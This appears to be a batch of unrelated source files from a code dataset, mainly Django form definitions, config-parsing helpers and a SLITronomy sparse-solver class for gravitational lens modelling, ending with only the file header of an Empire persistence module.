'backgroundColorBlue': 1.0, 'iconSize': 96.0, 'backgroundColorGreen': 1.0, 'arrangeBy': 'none', 'showIconPreview': True, 'gridSpacing': 100.0, 'gridOffsetY': 0.0, 'showItemInfo': False, 'labelOnBottom': True, 'backgroundType': 2, 'backgroundColorRed': 1.0 } alias = Alias.from_bytes(icvp['backgroundImageAlias']) alias.volume.name = package_name_ns alias.volume.posix_path = '/Volumes/' + package_name_ns alias.volume.disk_image_alias.target.filename = package_name_ns + '.temp.dmg' alias.volume.disk_image_alias.target.carbon_path = 'Macintosh HD:Users:\x00apiocoinuser:\x00Documents:\x00apiocoin:\x00apiocoin:\x00' + package_name_ns + '.temp.dmg' alias.volume.disk_image_alias.target.posix_path = 'Users/apiocoinuser/Documents/apiocoin/apiocoin/' + package_name_ns + '.temp.dmg' alias.target.carbon_path = package_name_ns + ':.background:\x00background.tiff' icvp['backgroundImageAlias'] = biplist.Data(alias.to_bytes()) ds['.']['icvp'] = icvp ds['.']['vSrn'] = ('long', 1) ds['Applications']['Iloc'] = (370, 156) ds['Apiocoin-Qt.app']['Iloc'] = (128, 156) ds.flush() ds.close()
61.95
1,817
0.724778
ae11f429e05e898ed4f2102e3645a2ef36a1d317
655
py
Python
viewer/forms.py
reskyner/fragalysis-backend
6b83e801b86f8b39ed02d6a8cae466790c2bd486
[ "Apache-2.0" ]
null
null
null
viewer/forms.py
reskyner/fragalysis-backend
6b83e801b86f8b39ed02d6a8cae466790c2bd486
[ "Apache-2.0" ]
null
null
null
viewer/forms.py
reskyner/fragalysis-backend
6b83e801b86f8b39ed02d6a8cae466790c2bd486
[ "Apache-2.0" ]
null
null
null
from django import forms import zipfile from cStringIO import StringIO CHOICES = [ (0, 'validate'), (1, 'upload'), ] class CSetForm(forms.Form): target_name = forms.CharField(label='Target', max_length=100) sdf_file = forms.FileField(label='All compounds sdf (.sdf)') pdb_zip = forms.FileField(required=False, label='PDB files (.zip)') submit_choice = forms.CharField(widget=forms.RadioSelect(choices=CHOICES)) upload_key = forms.CharField(label='Upload Key') class UploadKeyForm(forms.Form): contact_email = forms.EmailField(widget=forms.TextInput(attrs={'class':'form-control', 'autocomplete':'off'}), required=True)
32.75
129
0.723664
a5630ed7c0808b97cbd43c8cc31c9f3098aafb2a
11,342
py
Python
src/config/options.py
spunkmars/django-spms
95ac193891f93da07c3a26feeaf846e6030f3466
[ "BSD-3-Clause" ]
23
2020-04-14T07:50:38.000Z
2022-01-27T09:07:19.000Z
src/config/options.py
bjzhangyong/django-spms
95ac193891f93da07c3a26feeaf846e6030f3466
[ "BSD-3-Clause" ]
8
2021-03-19T09:01:16.000Z
2022-02-10T12:28:55.000Z
src/config/options.py
bjzhangyong/django-spms
95ac193891f93da07c3a26feeaf846e6030f3466
[ "BSD-3-Clause" ]
6
2020-04-14T13:34:29.000Z
2022-01-25T04:05:16.000Z
# -*- coding: utf-8 -*- from __future__ import unicode_literals import sys if sys.version_info >= (3, 6, 0): import configparser as ConfigParser else: import ConfigParser from django.utils.translation import ugettext_lazy from django.utils.translation import ugettext from spmo.common import Common def get_conf_obj(config_file=None): config = ConfigParser.ConfigParser() config.read(config_file) return config def get_conf_to_dict(config_file=None): c_dict = {} config = get_conf_obj(config_file=config_file) sections = config.sections() for sect in sections: c_dict[sect] = config.items(sect) return c_dict def get_option_val(conf_obj=None, section=None, c_k={}): if conf_obj.has_option(section, c_k['name']): if c_k['type'] == 'boolean': return conf_obj.getboolean(section, c_k['name']) elif c_k['type'] == 'int': return conf_obj.getint(section, c_k['name']) elif c_k['type'] == 'float': return conf_obj.getfloat(section, c_k['name']) elif c_k['type'] == 'list': cl = [] cl_str = conf_obj.get(section, c_k['name']) cl = cl_str.split(',') cl = [l.strip() for l in cl] return cl elif c_k['type'] == 'text': return conf_obj.get(section, c_k['name']) else: return conf_obj.get(section, c_k['name']) elif 'has_default' in c_k and c_k['has_default'] is True and 'default' in c_k: return c_k['default'] else: raise Exception('Can not find option, and has not defualt !') def get_section_val(conf_obj=None, section=None, c_ks={}): c_args = {} if not conf_obj.has_section(section): raise Exception('Can not find section: [%s] !' % section) for k in c_ks: if k['require'] is True: if not conf_obj.has_option(section, k['name']): raise Exception('Can not find section: [%s] option: [%s] !' % (section, k['name'])) c_args[k['name']] = get_option_val(conf_obj=conf_obj, section=section, c_k=k) return c_args def get_common_conf(config_file=None): config = get_conf_obj(config_file=config_file) sections = {} c_args = {} c_keys = { 'common': [ {'name': 'site_name', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, {'name': 'site_desc', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, {'name': 'site_version', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, {'name': 'site_copyright_year', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, {'name': 'secret_key', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, {'name': 'debug', 'type': 'boolean', 'default': False, 'require': False, 'has_default': True}, {'name': 'time_zone', 'type': 'text', 'default': 'Asia/Shanghai', 'require': False, 'has_default': True}, {'name': 'language_code', 'type': 'text', 'default': 'en-us', 'require': False, 'has_default': True}, ], 'cors': [ {'name': 'cors_allow_credentials', 'type': 'boolean', 'default': True, 'require': False, 'has_default': True}, {'name': 'cors_origin_allow_all', 'type': 'boolean', 'default': True, 'require': False, 'has_default': True}, {'name': 'cors_origin_whitelist', 'type': 'list', 'default': [], 'require': False, 'has_default': True}, ] } sections['common'] = get_section_val(conf_obj=config, section='common', c_ks=c_keys['common']) sections['cors'] = get_section_val(conf_obj=config, section='cors', c_ks=c_keys['cors']) c_args = sections return c_args def get_db_conf(config_file=None): config = get_conf_obj(config_file=config_file) sections = {} c_args = {} c_keys = { 'common': [ {'name': 'db_type', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, ], 'sqlite': [ {'name': 'db_name', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, ], 'mysql': [ {'name': 'host', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, {'name': 'port', 'type': 'int', 'default': None, 'require': True, 'has_default': False}, {'name': 'user', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, {'name': 'passwd', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, {'name': 'db', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, ], 'redis': [ {'name': 'type', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, {'name': 'host', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, {'name': 'port', 'type': 'int', 'default': None, 'require': True, 'has_default': False}, {'name': 'user', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, {'name': 'passwd', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, {'name': 'db', 'type': 'int', 'default': None, 'require': True, 'has_default': False}, ], } sections['common'] = get_section_val(conf_obj=config, section='common', c_ks=c_keys['common']) if sections['common']['db_type'] == 'sqlite': sections['sqlite'] = get_section_val(conf_obj=config, section='sqlite', c_ks=c_keys['sqlite']) elif sections['common']['db_type'] == 'mysql': sections['mysql'] = get_section_val(conf_obj=config, section='mysql', c_ks=c_keys['mysql']) sections['redis'] = get_section_val(conf_obj=config, section='redis', c_ks=c_keys['redis']) c_args = sections return c_args def get_cas_conf(config_file=None): config = get_conf_obj(config_file=config_file) sections = {} c_args = {} c_keys = { 'common': [ {'name': 'mama_cas_enable_single_sign_out', 'type': 'boolean', 'default': True, 'require': False, 'has_default': True}, {'name': 'allow_sites', 'type': 'list', 'default': None, 'require': True, 'has_default': False}, {'name': 'deny_sites', 'type': 'list', 'default': None, 'require': True, 'has_default': False}, ], 'site': [ {'name': 'service', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, {'name': 'callbacks', 'type': 'list', 'default': None, 'require': True, 'has_default': False}, {'name': 'logout_allow', 'type': 'boolean', 'default': None, 'require': True, 'has_default': False}, {'name': 'logout_url', 'type': 'text', 'default': None, 'require': True, 'has_default': False}, ], } sections['common'] = get_section_val(conf_obj=config, section='common', c_ks=c_keys['common']) allow_sites = [] if 'allow_sites' in sections['common']: a_sites = sections['common']['allow_sites'] if 'deny_sites' in sections['common']: d_sites = sections['common']['deny_sites'] allow_sites = list(set(a_sites) - set(d_sites)) else: allow_sites = a_sites for s in allow_sites: sections[s] = get_section_val(conf_obj=config, section=s, c_ks=c_keys['site']) c_args = sections return c_args class GoballOptions(Common): def __init__(self, *args, **kwargs): self.trans_type = kwargs.get('trans_type', 'lazy') self.OPTIONS = {} self.set_trans(trans_type=self.trans_type) super(GoballOptions, self).__init__(*args, **kwargs) def original_output(self, var_s=''): return var_s def set_trans(self, **kwargs): self.trans_type = kwargs.get('trans_type', self.trans_type) if self.trans_type == 'lazy': self.trans = ugettext_lazy elif self.trans_type == 'original': self.trans = self.original_output elif self.trans_type == 'immediate': self.trans = ugettext else: self.trans = self.original_output self.set_options() def set_option(self, var_name, val): setattr(self, var_name, val) self.OPTIONS[var_name] = val def set_options(self): self.set_option('INT_CHOICES', ( (0, self.trans('True')), (1, self.trans('False')), ) ) self.set_option('STATUS_CHOICES', ( (0, self.trans('Valid')), (1, self.trans('Spare')), (2, self.trans('Invalid')), ) ) self.set_option('BOOLEAN_CHOICES', ( ('true', self.trans('true')), ('false', self.trans('false')), ) ) self.set_option('TBOOLEAN_CHOICES', ( (True, self.trans('true')), (False, self.trans('false')), ) ) self.set_option('TF_CHOICES', ( (True, self.trans('True')), (False, self.trans('False')), ) ) def trans_tuple_to_dict(self, v_tuple): n_dict = {} for vv in v_tuple: n_dict[vv[1]] = vv[0] return n_dict def reverse_dict(self, dict={}): n_dict = {} for key in dict: n_dict[dict[key]] = key return n_dict def get_option(self, var_name=None): return getattr(self, var_name) def get_dict_option(self, var_name=None): var = getattr(self, var_name) return self.trans_tuple_to_dict(var) def get_reverse_dict_option(self, var_name=None): c_dict = self.get_dict_option(var_name) n_dict = self.reverse_dict(c_dict) return n_dict def declare_goball_options(trans_type='lazy'): GB_OP = GoballOptions(trans_type=trans_type) for option in GB_OP.OPTIONS: exec('global %s' % option) exec('%s = GB_OP.get_option("%s")' % (option, option)) # 声明变量 declare_goball_options()
37.309211
113
0.515253
6a9e79b784b5fce2847d866b7ad311979c5d1d47
24
py
Python
client/labml/__init__.py
vpj/lab
0575be18d1a7c4af67ccbb50a9c87f55de558481
[ "MIT" ]
174
2018-11-17T09:05:03.000Z
2020-04-17T21:50:47.000Z
client/labml/__init__.py
vpj/lab
0575be18d1a7c4af67ccbb50a9c87f55de558481
[ "MIT" ]
7
2019-07-02T23:27:58.000Z
2020-04-18T02:50:58.000Z
client/labml/__init__.py
vpj/lab
0575be18d1a7c4af67ccbb50a9c87f55de558481
[ "MIT" ]
21
2018-12-05T18:33:49.000Z
2020-04-18T03:58:30.000Z
__version__ = '0.4.150'
12
23
0.666667
4f0db8c58b9946fafc9eccd127dfcc073020a3d9
27,166
py
Python
slitronomy/Optimization/solver_base.py
austinpeel/SLITronomy
2fbd1a910e09c3e24268826a85f1c8684e9ffff0
[ "MIT" ]
null
null
null
slitronomy/Optimization/solver_base.py
austinpeel/SLITronomy
2fbd1a910e09c3e24268826a85f1c8684e9ffff0
[ "MIT" ]
null
null
null
slitronomy/Optimization/solver_base.py
austinpeel/SLITronomy
2fbd1a910e09c3e24268826a85f1c8684e9ffff0
[ "MIT" ]
null
null
null
__author__ = 'aymgal' # class that implements SLIT algorithm import copy import numpy as np from slitronomy.Optimization.model_operators import ModelOperators from slitronomy.Lensing.lensing_operator import LensingOperator from slitronomy.Optimization.noise_levels import NoiseLevels from slitronomy.Util.solver_plotter import SolverPlotter from slitronomy.Util.solver_tracker import SolverTracker from slitronomy.Util import util class SparseSolverBase(ModelOperators): """ Base class that generally defines a sparse solver """ #TODO: raises an error when number of decomposition scales is not consistent with image size # (also when reducing source plane size, re-check consistency) #TODO: create classes for lens and source models. # E.g. the method project_on_original_grid_source should be attached to some new "SourceModel" class, not to the solver. def __init__(self, data_class, lens_model_class, image_numerics_class, source_numerics_class, lens_light_mask=None, source_interpolation='bilinear', minimal_source_plane=False, use_mask_for_minimal_source_plane=True, min_num_pix_source=20, min_threshold=3, threshold_increment_high_freq=1, threshold_decrease_type='exponential', fixed_spectral_norm_source=0.98, include_regridding_error=False, sparsity_prior_norm=1, force_positivity=True, formulation='analysis', external_likelihood_penalty=False, random_seed=None, verbose=False, show_steps=False, thread_count=1): """ :param data_class: lenstronomy.imaging_data.ImageData instance describing the data. :param lens_model_class: lenstronomy.lens_model.LensModel instance describing the lens mass model. :param image_numerics_class: lenstronomy.ImSim.Numerics.numerics_subframe.NumericsSubFrame instance for image plane. :param source_numerics_class: lenstronomy.ImSim.Numerics.numerics_subframe.NumericsSubFrame instance for source plane. :param lens_light_mask: boolean mask with False/0 to exclude pixels that are assumed to contain only lens light flux. Defaults to None. :param source_interpolation: type of interpolation of source pixels on the source plane grid. It can be 'nearest' for nearest-neighbor or 'bilinear' for bilinear interpolation. Defaults to 'bilinear'. :param minimal_source_plane: if True, reduce the source plane grid size to the minimum set by min_num_pix_source. Defaults to False. :param use_mask_for_minimal_source_plane: if True, use the likelihood_mask to compute minimal source plane. Defaults to True. :param min_num_pix_source: minimal number of pixels on a side of the square source grid. Only used when minimal_source_plane is True. Defaults to 20. :param min_threshold: in unit of the noise (sigma), minimum threshold for wavelets denoising. Typically between 3 (more conservative thresholding) and 5 (more aggressive thresholding). Defaults to 3. :param threshold_increment_high_freq: additive number to the threshold level (in unit of the noise) for the highest frequencies on wavelets space. Defaults to 1. :param threshold_decrease_type: strategy for decreasing the threshold level at each iteration. Can be 'none' (no decrease, directly sets to min_threshold), 'linear' or 'exponential'. Defaults to None, which is 'exponential' for the source-only solver, 'linear' for the source-lens solver. :param fixed_spectral_norm_source: if None, update the spectral norm for the source operator, for optimal gradient descent step size. Defaults to 0.98, which is a conservative value typical of most lens models. :param sparsity_prior_norm: prior l-norm (0 or 1). If 1, l1-norm and soft-thresholding are applied. If 0, it is l0-norm and hard-thresholding. Defaults to 1. :param force_positivity: if True, apply positivity constraint to the source flux. Defaults to True. :param formulation: type of formalism for the minimization problem. 'analysis' solves the problem in direct space. 'synthesis' solves the peoblem in wavelets space. Defaults to 'analysis'. :param external_likelihood_penalty: if True, the solve() method returns a non-zero penalty, e.g. for penalize more a given lens model during lens model optimization. Defaults to False. :param random_seed: seed for random number generator, used to initialise the algorithm. None for no seed. Defaults to None. :param verbose: if True, prints statements during optimization. Defaults to False. :param show_steps: if True, displays plot of the reconstructed light profiles during optimization. Defaults to False. :param thread_count: number of threads (multithreading) to speedup wavelets computations (only works if pySAP is properly installed). Defaults to 1. """ num_pix_x, num_pix_y = data_class.num_pixel_axes if num_pix_x != num_pix_y: raise ValueError("Only square images are supported") image_grid_class = image_numerics_class.grid_class source_grid_class = source_numerics_class.grid_class lensing_operator_class = LensingOperator(lens_model_class, image_grid_class, source_grid_class, num_pix_x, lens_light_mask=lens_light_mask, minimal_source_plane=minimal_source_plane, min_num_pix_source=min_num_pix_source, use_mask_for_minimal_source_plane=use_mask_for_minimal_source_plane, source_interpolation=source_interpolation, verbose=verbose) super(SparseSolverBase, self).__init__(data_class, lensing_operator_class, image_numerics_class, fixed_spectral_norm_source=fixed_spectral_norm_source, thread_count=thread_count, random_seed=random_seed) # engine that computes noise levels in image / source plane, in wavelets space self.noise = NoiseLevels(data_class, subgrid_res_source=source_grid_class.supersampling_factor, include_regridding_error=include_regridding_error) # threshold level k_min (in units of the noise) self._k_min = min_threshold if threshold_increment_high_freq < 0: raise ValueError("threshold_increment_high_freq cannot be negative") else: self._increm_high_freq = threshold_increment_high_freq # strategy to decrease threshold up to the max threshold above if threshold_decrease_type not in ['none', 'lin', 'linear', 'exp', 'exponential']: raise ValueError("threshold_decrease_type must be in ['none', 'lin', 'linear', 'exp', 'exponential']") self._threshold_decrease_type = threshold_decrease_type if sparsity_prior_norm not in [0, 1]: raise ValueError("Sparsity prior norm can only be 0 or 1 (l0-norm or l1-norm)") self._sparsity_prior_norm = sparsity_prior_norm self._formulation = formulation self._force_positivity = force_positivity self._external_likelihood_penalty = external_likelihood_penalty self._verbose = verbose self._show_steps = show_steps self._tracker = SolverTracker(self, verbose=verbose) self._plotter = SolverPlotter(self, show_now=True) def set_likelihood_mask(self, mask=None): self._set_likelihood_mask(mask) # fill masked pixels with background noise self.fill_masked_data(self.noise.background_rms) def solve(self, kwargs_lens, kwargs_source, kwargs_lens_light=None, kwargs_ps=None, kwargs_special=None, init_lens_light_model=None, init_ps_model=None): """ main method to call from outside the class, calling self._solve() any class that inherits SparseSolverSource should have self._ready() and self._solve() methods implemented, with correct output. """ if not self._ready(): return # update lensing operator and noise levels self.prepare_solver(kwargs_lens, kwargs_source, kwargs_lens_light=kwargs_lens_light, kwargs_special=kwargs_special, init_lens_light_model=init_lens_light_model, init_ps_model=init_ps_model) # call solver image_model, coeffs_source, coeffs_lens_light, amps_ps \ = self._solve(kwargs_lens=kwargs_lens, kwargs_ps=kwargs_ps, kwargs_special=kwargs_special) # concatenate optimized parameters (wavelets coefficients, point source amplitudes) all_param = np.concatenate([coeffs_source, coeffs_lens_light, amps_ps]) #WIP if self._external_likelihood_penalty: if self.no_lens_light: logL_penalty = self.regularization(S=self.source_model) else: logL_penalty = self.regularization(S=self.source_model, HG=self.lens_light_model) else: logL_penalty = 0 return image_model, all_param, logL_penalty def _solve(self, kwargs_lens=None, kwargs_ps=None, kwargs_special=None): raise ValueError("This method must be implemented in class that inherits SparseSolverBase") def _ready(self): raise ValueError("This method must be implemented in class that inherits SparseSolverBase") @property def track(self): return self._tracker.track @property def component_names(self): return 'S', 'HG', 'P' @property def prior_l_norm(self): return self._sparsity_prior_norm def plot_results(self, **kwargs): return self._plotter.plot_results(**kwargs) def plot_source_residuals_comparison(self, *args, **kwargs): return self._plotter.plot_source_residuals_comparison(*args, **kwargs) @property def source_model(self): if not hasattr(self, '_source_model'): raise ValueError("You must run the optimization before accessing the source estimate") return self._source_model @property def lens_light_model(self): if not hasattr(self, '_lens_light_model') and not self.no_lens_light: raise ValueError("You must run the optimization before accessing the lens estimate") if self.no_lens_light: return None return self._lens_light_model @property def point_source_model(self): if not hasattr(self, '_ps_model') and not self.no_point_source: raise ValueError("You must run the optimization before accessing the point source estimate") if self.no_point_source: return None return self._ps_model def image_model(self, unconvolved=False): if self.no_lens_light and self.no_point_source: S = self.source_model if unconvolved: return self.F(S) return self.H(self.R(self.F(S))) elif not self.no_point_source: S, P = self.source_model, self.point_source_model if unconvolved: raise ValueError("Deconvolution is only supported for source light") return self.H(self.R(self.F(S))) + P else: S, HG = self.source_model, self.lens_light_model if unconvolved: raise ValueError("Deconvolution is only supported for source light") return self.H(self.R(self.F(S))) + HG @property def normalized_residuals_model(self): """ returns ( HFS + HG + P - Y ) / sigma """ return self.normalized_residuals(S=self.source_model, HG=self.lens_light_model, P=self.point_source_model) @property def residuals_model(self): """ returns ( HFS + HG + P - Y ) """ return self.residuals(S=self.source_model, HG=self.lens_light_model, P=self.point_source_model) def generate_initial_source(self): num_pix = self.num_pix_source transform = self.Phi_T_s return util.generate_initial_guess_simple(num_pix, transform, self.noise.background_rms, seed=self.random_seed) def generate_initial_lens_light(self): num_pix = self.num_pix_image transform = self.Phi_T_l return util.generate_initial_guess_simple(num_pix, transform, self.noise.background_rms, seed=self.random_seed) def apply_image_plane_mask(self, image_2d): return self.M(image_2d) def apply_source_plane_mask(self, source_2d): return self.M_s(source_2d) def project_on_original_grid_source(self, source): return self.lensingOperator.sourcePlane.project_on_original_grid(source) def psf_convolution(self, array_2d): return self.H(array_2d) @property def num_data_points(self): """ number of effective data points (= number of unmasked pixels) """ return int(np.sum(self._mask)) @property def best_fit_reduced_chi2(self): return self.reduced_chi2(S=self.source_model, HG=self.lens_light_model, P=self.point_source_model) @property def best_fit_mean_squared_error(self): return self.mean_squared_error(S=self.source_model, HG=self.lens_light_model, P=self.point_source_model) def loss(self, S=None, HG=None, P=None): """ returns f = || Y - HFS - HG - P ||^2_2 """ model = self.model_analysis(S=S, HG=HG, P=P) error = self.effective_image_data - model norm_error = np.linalg.norm(error.flatten(), ord=2) # flatten to ensure L2-norm return 0.5 * norm_error**2 def regularization(self, S=None, HG=None, P=None): """ returns p = lambda * || W_S ø alpha_S ||_0,1 + lambda * || W_HG ø alpha_HG ||_0,1 """ if S is not None: reg_S = self._regularization(S, self.Phi_T_s, self.M_s, self.noise.levels_source) else: reg_S = 0 if HG is not None: reg_HG = self._regularization(HG, self.Phi_T_l, self.M, self.noise.levels_image) else: reg_HG = 0 return reg_S + reg_HG def _regularization(self, image, transform, mask_func, noise_levels): lambda_ = np.copy(noise_levels) lambda_[0, :, :] *= (self._k_min + self._increm_high_freq) lambda_[1:, :, :] *= self._k_min alpha_image = mask_func(transform(image)) norm_alpha = np.linalg.norm((lambda_ * alpha_image).flatten(), ord=self._sparsity_prior_norm) return norm_alpha def residuals(self, S=None, HG=None, P=None): model = self.model_analysis(S=S, HG=HG, P=P) return model - self.effective_image_data def normalized_residuals(self, S=None, HG=None, P=None): """ returns ( HFS + HG + P - Y ) / sigma """ residuals = self.residuals(S=S, HG=HG, P=P) if hasattr(self, '_ps_error'): sigma = self.noise.effective_noise_map + self._ps_error else: sigma = self.noise.effective_noise_map return self.M(residuals / sigma) def reduced_chi2(self, S=None, HG=None, P=None): red_res = self.normalized_residuals(S=S, HG=HG, P=P) chi2 = np.sum(red_res**2) return chi2 / self.num_data_points def mean_squared_error(self, S=None, HG=None, P=None): res = self.residuals(S=S, HG=HG, P=P) return np.sum(res**2) / self.num_data_points @staticmethod def norm_diff(S1, S2): """ returns || S1 - S2 ||_2 """ diff = S1 - S2 return np.linalg.norm(diff.flatten(), ord=2) # flatten to ensure L2-norm def model_analysis(self, S=None, HG=None, P=None): model = 0 if S is not None: model += self.H(self.R(self.F(S))) if HG is not None: model += self.R(HG) if P is not None: model += P return model def model_synthesis(self, alpha_S=None, alpha_HG=None, P=None): model = 0 if alpha_S is not None: model = self.H(self.R(self.F(self.Phi_s(alpha_S)))) if alpha_HG is not None: model += self.R(self.Phi_l(alpha_HG)) if P is not None: model += P return model def gradient_loss_source(self, array_S): if self._formulation == 'analysis': return self._gradient_loss_analysis_source(S=array_S) elif self._formulation == 'synthesis': return self._gradient_loss_synthesis_source(alpha_S=array_S) def gradient_loss_lens(self, array_HG): if self._formulation == 'analysis': return self._gradient_loss_analysis_lens(HG=array_HG) elif self._formulation == 'synthesis': return self._gradient_loss_synthesis_lens(alpha_HG=array_HG) def proximal_sparsity_source(self, array, threshold, weights): if self._formulation == 'analysis': return self._proximal_sparsity_analysis_source(array, threshold, weights) elif self._formulation == 'synthesis': return self._proximal_sparsity_synthesis_source(array, threshold, weights) def proximal_sparsity_lens(self, array, threshold, weights): if self._formulation == 'analysis': return self._proximal_sparsity_analysis_lens(array, threshold, weights) elif self._formulation == 'synthesis': return self._proximal_sparsity_synthesis_lens(array, threshold, weights) def subtract_source_from_data(self, S): """Update "effective" data by subtracting the input source light estimation""" source_model = self.model_analysis(S=S, HG=None) self.subtract_from_data(source_model) def subtract_lens_from_data(self, HG): """Update "effective" data by subtracting the input (convolved) lens light estimation""" lens_model = self.model_analysis(S=None, HG=HG) self.subtract_from_data(lens_model) def subtract_point_source_from_data(self, P): """Update "effective" data by subtracting the input (convolved) lens light estimation""" self.subtract_from_data(P) @property def algorithm(self): if self._formulation == 'analysis': return 'FB' elif self._formulation == 'synthesis': return 'FISTA' def prepare_solver(self, kwargs_lens, kwargs_source, kwargs_lens_light=None, kwargs_special=None, init_lens_light_model=None, init_ps_model=None): """ Update state of the solver : operators, noise levels, ... The order of the following updates matters! """ _, _ = self.lensingOperator.update_mapping(kwargs_lens, kwargs_special=kwargs_special) if self.noise.include_regridding_error is True: magnification_map = self.lensingOperator.magnification_map(kwargs_lens) self.noise.update_regridding_error(magnification_map) self._prepare_source(kwargs_source) if not self.no_lens_light: # TODO: support upsampling/downsampling operator for image plane noise levels self._prepare_lens_light(kwargs_lens_light) # lens light initial model, if any self._init_lens_light_model = init_lens_light_model # point source initial model, if any if not self.no_point_source and init_ps_model is None: raise ValueError("A rough point source model is required to optimize point source amplitudes") self._init_ps_model = init_ps_model def _prepare_source(self, kwargs_source): """ updates source number of decomposition scales, spectral norm and noise levels related to the operator H(F(Phi_T_s( . ))) """ # update number of decomposition scales n_scales_new = kwargs_source[0]['n_scales'] if n_scales_new == -1: num_pix_source = self.lensingOperator.sourcePlane.num_pix n_scales_new = int(np.log2(num_pix_source)) if self._verbose: print("Set number of source scales to maximal value J={}".format(n_scales_new)) self.set_source_wavelet_scales(n_scales_new) # update spectral norm of operators self.update_spectral_norm_source() # update wavelets noise levels in source plane self.update_source_noise_levels() def _prepare_lens_light(self, kwargs_lens_light): """ updates lens light number of decomposition scales, spectral norm and noise levels related to the operator Phi_T_l( . ) Spectral norm and noise levels related to the Phi_T_l operator are not updated if the number of decomposition scales has not changed """ # get n_scales for lens light before update n_scales_old = self.n_scales_lens_light n_scales_new = kwargs_lens_light[0]['n_scales'] if n_scales_new == -1: num_pix_image = self.lensingOperator.imagePlane.num_pix n_scales_new = int(np.log2(num_pix_image)) if self._verbose: print("Set number of lens light scales to maximal value J={}".format(n_scales_new)) # update number of decomposition scales self.set_lens_wavelet_scales(n_scales_new) if n_scales_old is None or n_scales_new != n_scales_old: # update spectral norm of operators self.update_spectral_norm_lens() # update wavelets noise levels in image plane self.update_image_noise_levels() def update_source_noise_levels(self): self.noise.update_source_levels(self.num_pix_image, self.num_pix_source, self.Phi_T_s, self.F_T, self.R_T, psf_kernel=self.psf_kernel) def update_image_noise_levels(self): self.noise.update_image_levels(self.num_pix_image, self.Phi_T_l) def _update_weights(self, alpha_S, alpha_HG=None, threshold=None): lambda_S = np.copy(self.noise.levels_source) if threshold is None: threshold = self._k_min lambda_S[1:, :, :] *= threshold lambda_S[0, :, :] *= (threshold + self._increm_high_freq) weights_S = 1. / ( 1 + np.exp(10 * (alpha_S - lambda_S)) ) # fixed Eq. (C.1) if alpha_HG is not None: lambda_HG = np.copy(self.noise.levels_image) lambda_HG[1:, :, :] *= threshold lambda_HG[0, :, :] *= (threshold + self._increm_high_freq) weights_HG = 1. / ( 1 + np.exp(10 * (alpha_HG - lambda_HG)) ) # fixed Eq. (C.1) else: weights_HG = None return weights_S, weights_HG def _estimate_threshold_source(self, data, fraction=0.9): """ estimate maximum threshold, in units of noise, used for thresholding wavelets coefficients during optimization Parameters ---------- data : array_like Imaging data. fraction : float, optional From 0 to 1, fraction of the maximum value of the image in transformed space, normalized by noise, that is returned as a threshold. Returns ------- float Threshold level. """ if self._threshold_decrease_type == 'none': return self._k_min noise_no_coarse = self.noise.levels_source[:-1, :, :] # compute threshold wrt to the source component coeffs = self.Phi_T_s(self.F_T(self.R_T(self.H_T(data)))) coeffs_no_coarse = coeffs[:-1, :, :] coeffs_norm = self.M_s(coeffs_no_coarse / noise_no_coarse) coeffs_norm[noise_no_coarse == 0] = 0 return fraction * np.max(coeffs_norm) # returns a fraction of max value, so only the highest coeffs is able to enter the solution def _estimate_threshold_MOM(self, data_minus_HFS, data_minus_HG=None): """ Follows a mean-of-maximum strategy (MOM) to estimate thresholds for blind source separation with two components, typically in a problem solved through morphological component analysis (see Bobin et al. 2007). Note that we compute the MOM in image plane, even for the source component. Parameters ---------- data_minus_HFS : array_like 2D array of the imaging data with lensed convolved source subtracted. data_minus_HG : array_like, optional 2D array of the imaging data with convolved lens light subtracted. Returns ------- float Estimated threshold in the sense of the MOM. """ if self._threshold_decrease_type == 'none': return self._k_min noise_no_coarse = self.noise.levels_image[:-1, :, :] coeffs1_no_coarse = self.Phi_T_l(self.R_T(data_minus_HFS))[:-1, :, :] coeffs1_norm = self.M(coeffs1_no_coarse / noise_no_coarse) coeffs1_norm[noise_no_coarse == 0] = 0 max_HFS = np.max(np.abs(coeffs1_norm)) if data_minus_HG is not None: coeffs2_no_coarse = self.Phi_T_l(self.R_T(data_minus_HG))[:-1, :, :] coeffs2_norm = self.M(coeffs2_no_coarse / noise_no_coarse) coeffs2_norm[noise_no_coarse == 0] = 0 max_HG = np.max(np.abs(coeffs2_norm)) else: max_HG = max_HFS maxs = np.array([max_HFS, max_HG]) return maxs.min() + 0.001 * np.abs(max_HFS - max_HG) # SLIT_MCA version # return maxs.min() - 0.01 * ( maxs.max() - maxs.min() ) # MuSCADeT version # return np.mean(maxs) # original mean-of-max from Bobin et al. 2007 def _update_threshold(self, k, k_init, n_iter, n_iter_fix=5): """Computes a exponentially decreasing value, for a given loop index, starting at a specified value. Parameters ---------- k : float Current threshold. k_init : float Threshold value at iteration 0. n_iter : int Total number of iterations. n_iter_fix : int, optional. Number of iteration for which the threshold equals its minimum set vaélue `self._k_min`. Defaults to 5. Returns ------- float Decreased threshold, corresponding to the type of decrease. """ if self._threshold_decrease_type == 'none': return self._k_min elif self._threshold_decrease_type in ['lin', 'linear']: return util.linear_decrease(k, k_init, self._k_min, n_iter, n_iter_fix) elif self._threshold_decrease_type in ['exp', 'exponential']: return util.exponential_decrease(k, k_init, self._k_min, n_iter, n_iter_fix)
46.837931
190
0.656666
fa0c22c19de3e9b156049b11657468f5940684d4
17,828
py
Python
lib/modules/python/persistence/osx/CreateHijacker.py
Strazzom/Empire
9f519bc45b3b5a203f77d8c00b07499157c307ad
[ "BSD-3-Clause" ]
230
2017-03-01T22:29:59.000Z
2022-03-27T17:41:59.000Z
lib/modules/python/persistence/osx/CreateHijacker.py
Strazzom/Empire
9f519bc45b3b5a203f77d8c00b07499157c307ad
[ "BSD-3-Clause" ]
9
2017-03-05T17:01:46.000Z
2018-04-22T21:05:25.000Z
lib/modules/python/persistence/osx/CreateHijacker.py
Strazzom/Empire
